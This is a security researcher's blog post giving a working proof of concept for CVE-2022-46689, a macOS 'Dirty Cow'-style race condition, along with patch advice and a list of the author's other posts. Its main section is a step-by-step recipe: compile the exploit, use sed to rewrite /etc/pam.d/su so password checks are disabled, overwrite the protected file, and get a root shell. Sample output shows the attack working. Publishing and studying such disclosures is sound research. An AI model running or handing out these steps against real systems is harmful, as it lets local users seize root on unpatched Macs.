https://worthdoingbadly.com/macdirtycow/ Worth Doing Badly [ ] About Get new posts sent to your inbox: [ ] [ ] [Subscribe] Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug Dec 17, 2022 Get root on macOS 13.0.1 with CVE-2022-46689 (macOS equivalent of the Dirty Cow bug), using the testcase extracted from Apple's XNU source. Usage On a macOS 13.0.1 / 12.6.1 (or below) machine, clone the extracted test case: git clone https://github.com/zhuowei/MacDirtyCowDemo Then run: clang -o switcharoo vm_unaligned_copy_switch_race.c sed -e "s/rootok/permit/g" /etc/pam.d/su > overwrite_file.bin ./switcharoo /etc/pam.d/su overwrite_file.bin su You should get: % ./switcharoo /etc/pam.d/su overwrite_file.bin Testing for 10 seconds... RO mapping was modified % su sh-3.2# Tested on macOS 13 beta (22A5266r) with SIP off (it should still work with SIP on). If your system is fully patched (macOS 13.1 / 12.6.2), it should instead read: $ ./switcharoo /etc/pam.d/su overwrite_file.bin Testing for 10 seconds... vm_read_overwrite: KERN_SUCCESS:9865 KERN_PROTECTION_FAILURE:3840 other:0 Ran 13705 times in 10 seconds with no failure and running su should still ask for a password. Thanks to Sealed System Volume, running this on any file on the / System volume only modifies the file temporarily: It's reverted on reboot. Running it on a file on a writeable volume will preserve the modification after a reboot. Should I be worried? If you installed the latest macOS update (macOS 13.1 / 12.6.2 / 11.7.2), you should be fine. If you haven't, do it now. Will this be useful for iOS jailbreak? Probably not. This - as far as I can tell - affects userspace processes only. Jailbreaks require a kernel exploit. (The Apple Security release notes says that this bug may allow "arbitrary code with kernel privileges", but I can't see how.) You might still do something cool on iOS with this, but I'm not sure what you'd overwrite: codesigning should protect all executables and libraries. (I have not tested this: let me know if you find anything!) Credits * Ian Beer of Project Zero for finding this issue, and for finding other issues in XNU's virtual memory. Looking forward to the writeup for this issue. * Apple for the test case and patch. (I didn't change anything: I just added the command line parameter to control what to overwrite.) * SSLab@Gatech for the trick to disable password checking using / etc/pam.d. * @WangTielei for sharing a related issue and answering my questions. Changelog 2022-12-17: * clarified that "jailbreak" refers to iOS. * clarified that the Project Zero issue link goes to a different issue than this one. * link the patch in vm_map_copy_overwrite_unaligned. Recent posts: * Get root on macOS 13.0.1 with CVE-2022-46689, the macOS Dirty Cow bug * Get root on macOS 12.3.1: proof-of-concepts for Linus Henze's CoreTrust and DriverKit bugs (CVE-2022-26766, CVE-2022-26763) * Hardware-accelerated virtual machines on jailbroken iPhone 12 / iOS 14.1 * VoLTE/VoWiFi research with $0 of equipment: set up a phone network over Wi-Fi calling * Learning VoWifi, VoLTE, and IMS: because I'm too Millennial to make a phone call * Datamining Facebook's Novi wallet * Jailbroken iOS can't run macOS apps. I spent a week to find out why. * Disable Same Origin Policy in iOS WKWebView with private API * Examining CVE-2020-27932 on macOS 10.15.7 * Booting a macOS Apple Silicon kernel in QEMU * Build macOS ARM apps in Xcode without a real macOS ARM SDK * I tricked m3.euagendas.org, the Twitter analysis website, with adversarial inputs * Rendering SwiftUI views to HTML * Use GPU passthrough with Intel integrated graphics to accelerate QEMU on Fedora * Crash Chrome 70 with the SQLite Magellan bug * Learn how iOS devices sync over USB by enabling usbmuxd's debug logs * How a kids' novel inspired me to simulate a gene drive on 86 million genealogy profiles * Comparing Qualcomm's XBL UEFI bootloaders on Snapdragon 820, 835, and 845 * It's impossible to port Animoji to iPad Air * Tutorial - emulate AIX 7.2 in QEMU * Compile Metal shader Bitcode to x86 and ARM assembly * Create Memoji on iPad with Swift Playgrounds * Changing macOS's uptime with a kernel extension * Tutorial - emulate an iOS kernel in QEMU up to launchd and userspace * Almost booting an iOS kernel in QEMU * Fixing macOS native tabs for Visual Studio Code * Extracting libraries from dyld_shared_cache * Port an iOS app to macOS 10.14 in 5 minutes * iOS Simulator's secret trick to enable case sensitivity * Fixing two small bugs in Visual Studio Code * These 299 macOS apps are so buggy, Apple had to fix them in AppKit * Accessing screenshots from Android's Recent Apps screen Worth Doing Badly * Worth Doing Badly * [mail] * zhuowei * zhuowei Programming experiments by @zhuowei. Opinions are my own.